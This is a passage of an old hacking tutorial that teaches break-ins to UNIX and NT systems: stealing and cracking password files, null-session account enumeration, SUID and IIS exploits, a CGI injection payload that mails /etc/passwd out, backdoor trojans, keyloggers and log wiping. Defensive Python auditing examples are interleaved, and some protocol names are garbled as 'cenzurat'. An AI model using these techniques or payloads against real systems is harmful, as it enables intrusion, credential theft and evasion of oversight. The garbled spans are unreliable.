There are many exploits out there, for many different NOS’s, daemons, programs, and modules. One of the most common of these is the Buffer Overflow (also known as a Stack Overflow). This is a technique which when ran, the OS’s buffer (a container of memory set aside by the OS for data it’s working with) if filled with garbage. When the buffer is “filled,” the last string on the stack can be executed, to do such things as initiate a root shell. To use any local exploit, of course, you need to have an account that you can log into FTP with and upload the exploit from your computer to the server you want to run it on. Or if you only have telnet access, you can use vi (or some other text editor) and rewrite the exploit. Use cc or gcc to compile it if its not already (most UNIX exploits are not compiled, nor are most NT exploits). You then need to log in via telnet and run it, or launch it on the remote NT machine as explained above. Exploits are OS and version specific, and it’s sometimes hard to find one for a specific one (they are usually available all over the Internet). See the ‘System Exploits’ section for a list of more common vulnerabilities.
If you’re on a UNIX system with a non-root account, you have access to hundreds of programs. Chances are, at least one of these is vulnerable. Look up exploits for that flavor of UNIX, and you’ll most likely find at least one. To find out if a certain program exists on that machine, type one of these at a command prompt:

which program-name
whereis program-name

You’ll be told where the program resides, if it exists. To find a program or file on an NT machine that you have a drive mapped to, type:

dir /s file-name

while on the network drive.
If you can’t find a vulnerability, you might want to try your hand at cracking the password file.

The Password File
Some hackers try to get this file before even using exploits, though getting it may involve using them anyway. In the /etc directory (UNIX) is a file called passwd, which holds every password for every user, along with some other information. Unfortunately for you, the passwords are encrypted. This means you’ll have to download the password file and crack it on your own computer. You’ll use a password cracker such as John the Ripper for this. Another security feature system administrators will use to keep hackers out is password shadowing. If shadowing is done (and oftentimes it is), all the encrypted passwords will be replaced with *’s or x’s. These are not crackable. The real password hashes (encrypted passwords) are most likely in a different file. Here is a short list of where to find the real password file if /etc/passwd is shadowed.

UNIX Version        Path
------------------------------------------------
AIX 3               /etc/security/passwd
BSD 4.3             /etc/master.passwd
ConvexOS 10         /etc/shadpw
ConvexOS 11         /etc/shadow
Digital UNIX        /etc/tcb/aa/user/
HP-UX               /.secure/etc/passwd
IRIX 5              /etc/shadow
Linux               /etc/shadow
SunOS 5             /etc/shadow
System V r4.0       /etc/shadow
UNICOS              /etc/udb

The unshadowed file could, however, be anywhere. Use the grep command and look for files with the word ‘root’ to find potential candidates. You may not always have read access to the real file – you may have to do some stair stepping, or use a local exploit.
To give you an idea of what to look for, here is an encrypted password file:

root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu

Here is a shadowed password file:

root:*:0:1:Operator:/:/bin/csh
admin:*:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:*:1012:10:Hisaharu TANAKA:/home/user/kangaroo:/usr/local/bin/tcsh

At any rate, when you crack these, depending on the encryption strength and passwords used, you should get a handful of valid usernames and passwords. If you didn’t get the root password, you could also use one that belongs to the same group as root (such as admin or sysop). One note about root: a lot of systems are set up so that root cannot log in remotely (from outside). This means you’ll have to log in as someone else, then use the ‘su’ command and enter the root password (su is used by system administrators to jump around from account to account, and stands for ‘substitute user.’)
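As an added example (not part of the original text), here is how a defender reads the same file: the script parses passwd lines, separates entries that still carry a hash from shadowed ones, and flags malformed lines, empty password fields, extra UID-0 accounts, and members of root’s primary group. The sample input is constructed from the page’s own lines plus a few invented accounts.

```python
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample, built from the page's own passwd lines: the truncated
# 'kangaroo' entry is kept as-is to show what a damaged line looks like, and
# 'toor', 'sysop' and 'guest' are added to exercise the other checks.
SAMPLE_PASSWD = """\
root:2fkbNba29uWys:0:1:Operator:/:/bin/csh
admin:rYsKMjnvRppro:100:11:WWW administrator:/home/Common/WWW:/bin/csh
kangaroo:3A62i9qr:1012:10:Hisaharu
toor:*:0:1:Backup operator:/:/bin/sh
sysop:x:200:1:System operator:/home/sysop:/bin/csh
guest::300:300:Guest account:/home/guest:/bin/sh
"""

# Values in field 2 that mean "no hash here": shadowed (x, *) or locked (!, !!).
SHADOW_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    password: str  # hash, shadow marker, or empty
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> Tuple[List[PasswdEntry], List[str]]:
    """Parse passwd(5) text; return (well-formed entries, malformed raw lines)."""
    entries: List[PasswdEntry] = []
    malformed: List[str] = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            malformed.append(line)
            continue
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries, malformed


def audit_passwd(text: str) -> Dict[str, List[str]]:
    """Report what a defender wants to know before anyone else reads the file."""
    entries, malformed = parse_passwd(text)
    root_gid = next((e.gid for e in entries if e.name == "root"), None)
    return {
        "malformed": malformed,
        # hashes still in /etc/passwd: the file is world-readable, so they can be cracked offline
        "hash_exposed": [e.name for e in entries
                         if e.password and e.password not in SHADOW_MARKERS],
        # empty second field: login with no password at all
        "empty_password": [e.name for e in entries if e.password == ""],
        # a second UID 0 is a second root, whatever it is called
        "extra_uid0": [e.name for e in entries if e.uid == 0 and e.name != "root"],
        # accounts in root's primary group inherit its group-level access
        "root_group_members": [e.name for e in entries
                               if root_gid is not None and e.gid == root_gid and e.name != "root"],
    }


if __name__ == "__main__":
    for check, names in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{check:20s} {names}")
```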
NT passwords are a little different. They are kept in the registry, not just a file like UNIX, which makes them harder to get your hands on. They are encrypted as well. There are a few ways to get them.
· Do a core dump (RAM dump) since the registry is in memory. This is not easy for beginners, and surgically removing the hashes from memory requires debugging knowledge.
· Do a remote registry dump (with L0pht Crack). If the NT machine allows for remote registry sharing and you have NT at home, you can extract the password from your target’s registry over the Net.
· Get the sam._ file. If the Admin backs up the registry using rdisk.exe, the password hashes may be stored in \winnt\system32\repair or somewhere similar.

Remote registry dumps and importing the SAM hive (sam._) into L0pht Crack require NT. Windows NT registries are made up of hives. Each hive is stored in a *._ file. The hive with the passwords in it is SAM._. So why don’t you just download it like a UNIX password file? Because NT is set up not to let anyone see, copy, or modify the SAM hive. Your only hope besides the methods listed above is to boot your target machine into an alternative OS, like Linux or DOS, then get the file (NT protects the file; DOS and Linux don’t). This is difficult over the net. It is, however, possible. Also, you’ll need a program that will allow DOS (which uses the FAT filesystem) or Linux (which uses the EXT2 filesystem) to access the partition that SAM._ is on (an NTFS partition). Once in a while, though, you may come across copies of the hives (all with ._ extensions) stored in a directory like ‘repair’ or ‘reg_backup’. With all the work that it takes to get NT passwords, you’re usually better off trying some other method of getting in, like exploits.

Infiltration
Again, every open port (port that you found during your portscan) is a door to the insides of that computer. To find out how each port is a potential point of infiltration for you, you’ll need to find out a little more about each protocol. Do some research. For now, I’ve provided a little info on how you can use these protocols against the computer.
Again, when you log in via a telnet port, it is as if you are directly connected to and part of that network. One of the first things you should try is the “front door.” Telnet to the machine, and try some commonly used username and password combinations. Next, try each of the email addresses you’ve collected. About one in twenty people are dumb enough to use their first name or login name as their password (assuming they are allowed to set their own password), so try that too. Chances are this won’t work (though it’s a good idea to try anyway), so you can move on to hacking in through various ports.
Oftentimes the FTP service allows for anonymous logins (logging in with ‘ftp’ as a username and no password). When you do so, your home directory will be something like /usr/daemon/ftp or /home/ftp. However, if you issue a pwd (to find what directory you’re currently in), it will say that your pwd is / (root). This means that you are in a restricted shell. So if after logging in anonymously you cd (change directory) to lib, you will be told that you are in /lib, while you’ll really be in /home/ftp/lib, or whatever. System admins like to put /bin’s and /etc’s in the ftp directory, and in the /etc will be a password file – but don’t get your hopes up – 99% of the time it’s shadowed. Anonymous ftp access is really only helpful if you can download useful information.
If you see an open cenzurat port, this could be the break you were looking for. Use a cenzurat client and do a generic query (no usernames) to possibly get a list of users logged on. Next try putting an @ symbol in front of the domain you are querying, for a list of all users, logged on or not. For specific user information, type in E-mail.
The rlogin port may be another point of infiltration. This is kind of like telnet, though older and not as secure. Telnet to it and see what you can do.
The Gopher protocol was used as a text transfer protocol before the days of HTML, the WWW, and graphics on the web. If you come across a gopher port, use a browser with a built in gopher client (newer versions of Navigator and MIE) and connect to it. You’d be amazed as to what the gopher service will sometimes let you see.
Write down any other ports you see. Telnet to them all, and see what happens. If after you telnet in nothing happens, issue commands, hit enter a few times. Play around – as I said before, 80% of what you will know will come from experience, not texts.

Remote Xploits
Again, a local exploit is something you run on your victim once you’re already in. A remote exploit is something you run from your own computer that exploits a vulnerability on one of your target’s daemons. Commonly vulnerable daemons are FTP, SMTP, and HTTP. Oftentimes launching these will be logged on your target – so be sure to clean up the log files and erase any entries involving you.
Again, to exploit a daemon, find out what program it is, and what version. Search the exploit archives for an exploit for that, and if one exists, compile and run it. If the FTP port has the service wu-ftp ver 2.2.4, go out and find the exploit for that exact service of that exact version. If the SMTP port is running sendmail 8.8.8, get the sploit for it. These exploits will be in the form of C code (usually), so you’ll need to compile them. Most assume that you have specific header files (*.h), so you may need to find those as well – look at the code to be sure. To make obtaining the header files and compiling the exploits a heck of a lot easier, you ought to think about putting a Linux partition on your hard drive. At any rate, most remote exploits, if correctly implemented, when launched give you root access, or at least access. To find out what service an FTP port is running, telnet to it; it might just tell you. If not, use the SYST command, and then you’ll be told. You may have to log in to do so – try doing so anonymously. As far as SMTP goes, it hides its service software and version much less often than FTP does.

Elite Hacker Tactics
Up to this point, you’ve learned the basics of various NOS’s, and how the Internet works. “When will we get to the core hacking stuff?” You have been – breaking into a system is nothing more than understanding it thoroughly, knowing the ‘rules’, what you can and can’t do. Hacking is taking what you know, and using that to circumvent usually half-hearted attempts to keep casual onlookers from being where they aren’t supposed to be. Your most powerful weapon is a broad knowledge of computers and networks, and thorough knowledge of your target. Meaning go get yourself a UNIX box. Well, now that you know the basics of hacking, I’ll go into some more advanced tactics you can employ to gain access to computers on the Internet.

Service Exploitation
One of the first things you should do when you target a particular machine is telnet to every port and find out what services are running. Find out what FTP service, what POP and SMTP daemons are running (when you telnet to the appropriate port, it will usually tell you). Then go to sploit archives like www.securityfocus.com and www.rootshell.com, and subscribe to BugTraq and NT BugTraq. Look up every service/daemon you find, as well as the operating system. Most exploits are in C, so you’ll need to put a Linux partition on your hard drive to get them to compile and run. If you have problems compiling the sploits, brush up on your UNIX C utilities. Look in the manpages for cc, gcc, and make (if there is a makefile, which makes compiling the sploits lots easier). Just remember to chmod the xploit and make it executable, or you’ll get a message that the program couldn’t be found.

CGI Exploitation
CGI (Common Gateway Interface) is a method used to make web pages more interactive. For example: you visit your account at Hotmail. You type your username and password into the text boxes, and click ‘enter.’ The Hotmail computer then reads what you typed, and runs a script (which could be in a variety of programming or scripting languages) that logs you into your account. That’s CGI. Anytime you interface with the website (such as search engines) you are using CGI. CGI adds lots of functionality, and lots of security issues. There are currently all kinds of known CGI exploitations. Two old ones are http://www.someserver.com/cgi-bin/phf and http://www.someserver.com/cgi-bin/cenzurat. If the file in question (/cgi-bin/cenzurat) exists, and you request it, you will get a box up. In the box, type:

root ; mail E-mail < /etc/passwd

What this does when the computer runs the script is issue the command:

cenzurat (whatever you type in the box)

The ; operator starts a new command, which in this case is displaying the password file on your browser. Copy it, paste it into a text file, and crack it. To find CGI exploits, get a CGI exploit scanner (such as WebChk, available at The CyberUnderground) or use one on a web site such as CyberArmy.com or infinityzone.cjb.net.
Another problem with CGI is that webservers that are CGI enabled have special ‘CGI executable directories’. These include /cgi-bin/ (UNIX), /cgi-win/, and /cgi-dos/ (Windows machines). The HTTP daemon knows to execute any file requested in those directories. Normally, when you type www.someserver.com/index.html, all that is happening is the daemon sends you a copy of index.html. If you type www.someserver.com/cgi-bin/program, the daemon will actually run program, if it exists. The output of this process is usually exported to HTML format and sent to your computer. You as a hacker could exploit this, though, by running programs of your own on the remote machine (if, say, you had FTP access but not telnet). Great for spawning exploits.
In order to find out whether or not a particular web server is vulnerable (ie: has a CGI file somewhere on it that can be used to gain access), you can do a number of things. Download WebChk to scan for you. Go to a website such as infinityzone.cjb.net and use their built in CGI scanner. Or, for best results, obtain a list of vulnerable CGI files/servers and use a browser to scan for them manually. Doing things yourself, rather than using canned hacker tools, always provides better results along with expanding your own knowledge.
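The ‘;’ problem described above, as an added example that is not part of the original text: the way the old scripts built one shell string from the form field, the hardened handler that allow-lists the field and passes it as a single argument with no shell, and a log check that flags CGI requests carrying shell syntax in a parameter value. The command name lookup-user and the log lines are placeholders constructed for this example.

```python
import re
import subprocess
from typing import Dict, List
from urllib.parse import parse_qsl

LOOKUP_CMD = "lookup-user"  # placeholder for the script's back-end command (constructed)

# Allow-list for the form field: a plain UNIX login name and nothing else.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
# Characters that mean something to /bin/sh and never belong in a login name.
SHELL_META = re.compile(r"[;&|`$<>(){}\\\n]")


def vulnerable_command(field: str) -> str:
    """The original pattern: one string later handed to the shell (shell=True).
    A ';' in the field ends the lookup and starts a second command. Never run here."""
    return f"{LOOKUP_CMD} {field}"


def is_valid_username(field: str) -> bool:
    return USERNAME_RE.fullmatch(field) is not None


def safe_lookup_argv(field: str) -> List[str]:
    """Hardened form: validate, then pass the field as ONE argv element.
    No shell parses it, so a ';' could only ever be part of a (rejected) name."""
    if not is_valid_username(field):
        raise ValueError(f"rejected lookup field: {field!r}")
    return [LOOKUP_CMD, field]


def run_lookup(field: str) -> str:
    """What the CGI handler should call; a list argv means shell=False."""
    proc = subprocess.run(safe_lookup_argv(field), capture_output=True, text=True, check=False)
    return proc.stdout


# Constructed Common Log Format lines: two legitimate requests, two carrying
# shell metacharacters in the CGI query (the page's ';' trick, URL-encoded).
SAMPLE_LOG = """\
203.0.113.9 - - [14/Jul/2000:10:01:02 -0500] "GET /cgi-bin/lookup?user=asmith HTTP/1.0" 200 512
203.0.113.9 - - [14/Jul/2000:10:01:09 -0500] "GET /cgi-bin/lookup?user=root+%3B+mail+x%40example.net+%3C+/etc/passwd HTTP/1.0" 200 2048
198.51.100.4 - - [14/Jul/2000:10:02:00 -0500] "GET /index.html HTTP/1.0" 200 1024
198.51.100.4 - - [14/Jul/2000:10:02:30 -0500] "GET /cgi-bin/lookup?user=root%7Ccat%20/etc/passwd HTTP/1.0" 500 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')


def suspicious_cgi_requests(log_text: str) -> List[Dict[str, object]]:
    """Flag CGI requests whose decoded parameter values contain shell syntax or
    name the password file. Values are checked one by one, so the '&' that
    separates parameters does not trigger on its own."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or "?" not in m.group(2):
            continue
        client, path, status = m.groups()
        for key, value in parse_qsl(path.split("?", 1)[1], keep_blank_values=True):
            if SHELL_META.search(value) or "/etc/passwd" in value:
                hits.append({"client": client, "param": key, "value": value, "status": int(status)})
                break
    return hits
```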

Sniffing and Keylogging
Oftentimes you’ll need to break into not-so-interesting computers to get to your ultimate goal. If you are trying to break into your target network’s webserver (www.yourtarget.com) and, while trying, find a vulnerability in their mail server (mail.yourtarget.com), you have a few options on how to get into the webserver from the mailserver. If you install a sniffer (available at many hacker sites), it will look at all data passing it on the network for passwords and the like. It will copy and store that information in a file for you to periodically check. Sniffing (which is considered an eleet hacker tactic), if done correctly, almost always provides results. Another option is installing a keylogger on the mailserver. Any keystrokes entered on that computer are kept in a log file. Periodically check the file, and you’ll usually come up with a password to something else interesting. Be careful though. If you don’t hide your sniffers or keyloggers well, you stand a good chance of getting busted, or at least losing any access you had.

Leapfrogging
Most firewalls keep you out of 90% of any given network on the Internet. How? They look at your IP address, and determine whether to allow you in or not. Usually, this is a router (a piece of hardware used to connect different networks) that has a list of IP addresses to accept. If yours is not in that list, it will reject your connection. It’s a good bet that this list contains mostly machines inside that network, or from a few other trusted networks. Oftentimes router firewalls let connections pass from other computers in the same subnet. Let’s pretend you are 203.22.54.77. You want to get into admin.somecorp.com (34.14.91.15), which is behind the firewall. www.somecorp.com is (like most webservers are) in front of the firewall, and is 34.14.91.3. If you try to telnet to admin, chances are you won’t even get a login prompt, just a ‘connection failed’ message. But if you telnet to www, then to admin, your IP address is that of www (34.14.91.3), which is in the same subnet as admin, and will most likely be accepted. And there you have your login prompt at admin.somecorp.com. This is conceptually hacking around a firewall. To break right through, well, you’d better be elite. Fortunately for you, there’s a ‘Firewall Penetration’ section near the end of this text.

Trojans
Don’t assume that once you have access (be it a rootshell or just user or guest access) to a computer, you always will. One good way to increase your chances of keeping access to this computer is to put in a back door of some kind. The easiest (and arguably most helpful to a hacker) is a Trojan Horse. Trojans come in all shapes and sizes, for all kinds of OS’s. The three most popular are Back Orifice, SubSeven, and Netbus. All three are for Windows boxes (try RootKit for a UNIX Trojan). BO by itself is command-line, but GUIs (Graphical User Interfaces) are available for it. BO has a server (that you install on your target) and a client program (that you use at home to control your target). With it, you can browse and manipulate data and directories on your target. You can send message boxes to the computer to scare people on it. NetBus, on the other hand, has more functions than BO (like screenshots of your victim, opening and closing the CD-ROM, etc), but doesn’t hide itself quite as well as BO. NetBus, like BO, has a client and a server. Though Trojans are extremely fun for scaring sysadmins, if you want to keep your access to the box, you should only use one as a backdoor.

Port Hacking
If you can’t find any exploits for the daemon you’ve found, that doesn’t mean it’s not vulnerable. Theoretically, every daemon bound to a TCP port could be used as an access point to the computer’s insides. Telnet to the port, and interact with the daemon. At the top of your telnet window is the word ‘Telnet.’ As soon as it says ‘Telnet – www.yourtarget.com’ (or some IP address) you are connected and have established a session, whether you see text or not. Send control characters (control-x, control-c, etc). Type commands like GET, GO, START, LOGON, INIT, etc. If what you type doesn’t show up on the screen, that means that the daemon isn’t echoing your characters back to you – turn on your local echo so you can see what you are typing.
For example: the HTTP GET command I explained earlier. You can do this manually – telnet to port 80, issue a GET command with the page you want to view, hit enter twice, and the HTML will pour across the screen. You are doing manually what Netscape, Internet Explorer, and Lynx do for you (except that browsers parse the HTML into readable text). Any client program that communicates with a server program on some port is just issuing various commands to the daemon based on how the user interacts with the client interface. Sometimes, an initialization command needs to be issued before the daemon will talk to you. Try anything you can think of. Also, it helps to know what types of programs are bound to the port you are hacking. Refer to Appendix D on well known ports at the end of this text.
One last note on this topic. Sometimes, sysadmins, authorized users, and even other hackers will bind a daemon to some extremely high port number as a back door. Casual portscans will miss these, unless they are set to scan to high numbers. If you see port 12345 or 31337 open on some computer, someone was here before you – these are the defaults used by the Netbus and Back Orifice Trojans. Also, lazy system administrators sometimes put daemons on high port numbers that let them telnet in without a password.

NT: The SID
In an NT environment, every user, group, and domain has a unique numeric value that represents it. If you change the name of a particular group, this number, the SID (Security IDentifier), stays the same, so the group’s properties remain unchanged. And with a valid connection to an NT box, you can use the SID to find valid login names for that machine (if you have a connection to the PDC you’ll get login names for the whole domain). You’ll do this with the infamous user2sid and sid2user tools, available at www.hackingexposed.com. Getting every username is invaluable for Brute Forcing – put the names you find into a text file and use NAT, Legion 2.1, or Brutus to take care of the rest. The first step, though, is connecting to the box in question. Use the Net View command – if you don’t have a login name, the null IPC session technique will usually work (net use \\ip_add\ipc$ "" /user:""). Once you get a ‘command was completed successfully’ for any net use command, you’re connected, and can use the sid tools to get every username. (The reason this works is because the LookupAccountName and LookupAccountSid Win32 system calls can be called by anyone with ‘Everyone’ access – including someone with a null IPC session.) Let’s say you null IPC’d 38.100.100.1. You want to find members of the group ‘Domain Users,’ which is essentially everyone (this works only if 38.100.100.1 is a domain controller – Domain Users doesn’t exist on non-DCs). You’d type this at a command prompt:

C:\toolz>user2sid \\38.100.100.1 “domain users”

Which would give you that group’s SID. Pretend you get:

S-1-5-7464736-37373837-513

We are interested in the last three digits of the SID: 513. These last digits are the RID. The RID is the only number that will be different for every other user and group SID. Meaning every other SID in this domain will start with:

S-1-5-7464736-37373837

And a different 3 digit RID exists for every group and user. We now know that “domain users” RID is 513. The Administrator account is always RID 500. To verify that, we’ll do this:

C:\toolz>sid2user S-1-5-7464736-37373837-500
User Admini

There – it told us the user for that SID. Only this sysadmin thinks he’s slick by changing the Administrator account to Admini. Heh. Now, run sid2user against every RID from 501 upward until you get an error saying “no such SID”. So next you’d:

C:\toolz>sid2user S-1-5-7464736-37373837-501
User asmith

And so forth. If you’re connected to a non domain controller (member server), you’ll get every user for that box. If it’s a DC, you’ll get every global user – that is every user associated with the domain itself, not an individual computer. Now you have a list of login names to BF.
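The SID arithmetic above as an added example, not code from the text or from the user2sid/sid2user tools: parse a SID into its domain identifier and RID, then audit an account listing the way a defender would, reporting the built-in account that was renamed (RID 500 gives it away regardless of name) and any SID from a different domain. The account export is constructed to mirror the page’s scenario.

```python
import re
from typing import Dict, List, NamedTuple

# RIDs NT reserves for built-in principals; the RID survives any renaming.
WELL_KNOWN_RIDS = {
    500: "Administrator",
    501: "Guest",
    512: "Domain Admins",
    513: "Domain Users",
    514: "Domain Guests",
}

SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


class Sid(NamedTuple):
    authority: int   # the '5' in S-1-5-...
    domain: str      # identifier shared by every SID in the domain, e.g. '7464736-37373837'
    rid: int         # relative identifier, unique per user/group within the domain


def parse_sid(text: str) -> Sid:
    """Split 'S-1-<auth>-<sub>-...-<rid>' into its parts; reject anything else."""
    m = SID_RE.match(text.strip())
    if not m:
        raise ValueError(f"not a SID: {text!r}")
    subs = m.group(2).lstrip("-").split("-")
    return Sid(int(m.group(1)), "-".join(subs[:-1]), int(subs[-1]))


# Constructed account export for the page's scenario: the built-in Administrator
# has been renamed 'Admini', and one account carries a SID from another domain.
SAMPLE_ACCOUNTS = {
    "Admini": "S-1-5-7464736-37373837-500",
    "Guest": "S-1-5-7464736-37373837-501",
    "Domain Users": "S-1-5-7464736-37373837-513",
    "asmith": "S-1-5-7464736-37373837-1001",
    "svc_backup": "S-1-5-99999999-11111111-1002",
}


def audit_accounts(accounts: Dict[str, str], expected_domain: str) -> Dict[str, List[str]]:
    """Renaming a built-in account hides nothing: RID 500 is still the Administrator.
    Also report SIDs whose domain part differs from the one this export should contain."""
    findings: Dict[str, List[str]] = {"renamed_builtin": [], "foreign_domain": []}
    for name, sid_text in accounts.items():
        sid = parse_sid(sid_text)
        if sid.domain != expected_domain:
            findings["foreign_domain"].append(f"{name} ({sid_text})")
            continue
        builtin = WELL_KNOWN_RIDS.get(sid.rid)
        if builtin is not None and builtin != name:
            findings["renamed_builtin"].append(f"{name} has RID {sid.rid} ({builtin})")
    return findings


if __name__ == "__main__":
    print(audit_accounts(SAMPLE_ACCOUNTS, "7464736-37373837"))
```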

UNIX: SUID Binaries
This is a biggie for any aspiring UNIX hacker. You get access to a UNIX box, and want root. Your first step should be the password file. If it’s protected (you don’t have access to it), next you’d look for common vulnerabilities – and local exploits for them. Check the System Exploits section below for common ones. If you don’t see any at first glance, that doesn’t mean there are no vulnerable filez. Daemons aren’t the only programs vulnerable to buffer overflows. Any binary (executable) might be vulnerable. These binaries have access privileges of their own – just like a user. They can be denied or granted access to other resources just like a user can. All users and binaries have UID’s (User ID’s) and GID’s (Group ID’s) – and the lower the better (root being zero). Binaries with low privileges (high number UID’s) will often be denied when they try to access other files. Binaries with higher privileges (lower UID’s) will have more access. So naturally we want to sploit a binary with root-equivalent privileges, or perms (permissions). Binaries with Superuser User ID’s – SUID perms. And with one command line you can find every SUID binary on the system:

$ find / -type f -perm -04000 -ls

The output of this command will give you every binary with SUID perms, or root privileges. The list will probably be pretty big. Go to an exploit archive with a searchable database (Rootshell or SecurityFocus) and look up every SUID binary you found. Chances are one will be vulnerable – get the code, run it, and you’ll have root.
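The same find as an added example (not part of the original text), turned around to the administrator’s use: list the SUID regular files under a tree and diff them against a baseline taken at install time, so a planted SUID binary stands out from the long legitimate list. The demo builds a constructed directory tree in a temp dir; file names there are stand-ins, not real binaries.

```python
import os
import shutil
import stat
import tempfile
from pathlib import Path
from typing import Dict, Set


def find_setuid_files(root: str) -> Set[str]:
    """Python equivalent of 'find ROOT -type f -perm -04000': regular files
    (not directories, not symlinks) with the set-user-ID bit, as paths relative to ROOT."""
    found: Set[str] = set()
    for dirpath, _dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: a symlink to a SUID file is not itself SUID
            except OSError:
                continue                     # vanished or unreadable; skip it, don't abort the audit
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(os.path.relpath(path, root))
    return found


def compare_with_baseline(current: Set[str], baseline: Set[str]) -> Dict[str, Set[str]]:
    """The raw list is long on any system; what matters is what changed since the
    install-time baseline. 'new' is where a planted SUID binary shows up."""
    return {"new": current - baseline, "missing": baseline - current}


def demo() -> Dict[str, Set[str]]:
    """Build a constructed tree in a temp dir, audit it against a baseline, clean up."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    try:
        bin_dir = Path(base, "usr", "bin")
        bin_dir.mkdir(parents=True)
        # constructed stand-ins: two expected SUID files, one plain file, one planted SUID file
        for name, mode in {"passwd": 0o4755, "su": 0o4755, "ls": 0o755, "shell": 0o4755}.items():
            target = bin_dir / name
            target.write_bytes(b"\x7fELF")
            target.chmod(mode)
        suid_dir = Path(base, "tmp")
        suid_dir.mkdir()
        suid_dir.chmod(0o4755)               # SUID bit on a directory: '-type f' must ignore it
        (bin_dir / "su-link").symlink_to(bin_dir / "su")   # symlink: must be ignored as well
        baseline = {"usr/bin/passwd", "usr/bin/su"}
        return compare_with_baseline(find_setuid_files(base), baseline)
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```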

Peering through the Eyes of your Enemy
Hacking pits you against a system. This system, be it a huge inter-network or just one computer, is nothing by itself. Servers don’t run and secure themselves. An administrator, or sysadmin, runs them. Hacking into his box is going head-to-head with the sysadmin. So how do you gain the competitive edge? You need to see the playing field from his point of view.
There will come times when the prewritten exploits don’t work on your target system, and brute force either didn’t work or is too unstealthy for a hacker as leet as you. What do you do? Well, suppose the server you’re trying to crack is a Netscape Enterprise Server. Install Enterprise Server on your machine. By doing this, you’ll get a number of valuable pieces of info.
· Default Directory Structures – where you can find stuff
· Default Passwords – worth a try
· Out-of-the-box scripts – CGI stuph that you could exploit
If you’re serious about hacking a system, you (usually) are better armed knowing about it. And the more the better. Most server software will have a free evaluation version. Otherwise check the warez pages.
No matter what server you’re hacking, you definitely want some kind of UNIX partition and an NT partition. Get RedHat, SuSE, or Caldera Linux (most versions are around $30) and play with it. Set up an account with no privileges. Download exploits (remote and local) and try to get root on your own box. Then do the same with NT. Try the getadmin and iishack exploits. Once you have a feel for how these more common xploits work, you’ll be better at using them against a real target.

System Exploits
You target a network. Scan ports on every machine, telnet to every open port to find out what service is running, and look up every service at every exploit archive. Within a few hours, you’ll have a list of at least a few vulnerabilities, meaning a couple of ways in. Remember: in every network there is always at least one insecure computer. And from that box you can hack the rest of the network without much trouble (using local exploits and passwords stolen from the first system you hacked). Here, again, is a list of places to go to look for exploits. If you find info on one exploit somewhere, still check the others for better or updated info.

· www.rootshell.com
· www.securityfocus.com
· www.ntbugtraq.com
· www.insecure.org
· www.anticode.com
· www.infilsec.com/vulnerabilities
· www.xforce.iss.net
· www.hoobie.net/security/exploits
· www.net-space.org/lsv-archive/bugtraq.html
· home.cyberarmy.com/tcu

Here I will go over specific vulnerabilities to look for in any system you’re trying to hack. For more info on each of these, visit the exploit archives above. Most give either an explanation on how to exploit the security bug, or offer code that will do it for you.

MS Front Page ASP Dot and ASP Alternate Data Stream Vulnerabilities (remote)
These exploits affect FrontPage version 3. Any ASP file (the NT equivalent of UNIX .cgi files) is viewable to a hacker by just appending a dot to the end (eg: request somefile.asp like this: somefile.asp.). ASP code oftentimes contains local file references and even usernames and passwords.
Another way to view ASP code is to append the string ::$DATA to the URL. Eg: somefile.asp::$DATA. If the server you’re targeting is patched against the dot vulnerability, try this one.

IIS Remote Buffer Overflow Vulnerability (remote)
A lot of IIS Webservers (IIS is the webserver that comes with NT) are vulnerable to this exploit. Using the exploit code iishack.asm (assembly) or iishack.exe (win32 binary) you can force the IIS web daemon to download and run any file on the Net you specify – including ncx or netbus. The code is available at www.technotronic.com and www.eeye.com.

IIS RDS Vulnerability (remote)
A lot of IIS Servers are also vulnerable to this attack. If the server has Remote Data Service enabled (including msadc.dll – which many do) you can run the exploit code from your home computer and send commands to the server. Copy \winnt\system32\repair\sam._ to \inetpub\wwwroot\ and download the SAM hive. The exploit code is available at rootshell and securityfocus.

WebSitePro Vulnerabilities (remote)
Out of the box, WebSitePro for NT has a few vulnerabilities. The CGI file uploader.exe allows anyone to upload files. Check for it in /cgi-win/, /cgi-dos/, /cgi-bin/, or /cgi-shl/. Also, any files you upload into any of these directories can be executed (by just requesting them with your browser). Can you say Netbus?

NT Getadmin Exploit (local)
The executable exploits getadmin.exe and sechole.exe will make any user of the machine a member of the Administrators and Domain Admins groups. If you hack into an NT box with a user account that doesn’t have a whole lot of permissions, use one of these exploits. They’re available at anticode.

NT RAS Buffer Overrun (local)
This local exploit tricks rasman.exe into spawning a rootshell (command prompt with system privileges). The exploit code and more info are available at www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.

Winhlp32 Buffer Overrun (local)
Using the exploit code, a hacker can run a batch file with system privileges. Put rdisk /s in the batch file to dump the SAM onto the hard disk. Exploit code and an explanation at www.infowar.co.uk/mnemonix/ntbufferoverruns.htm.

Cold Fusion Vulnerabilities (remote)
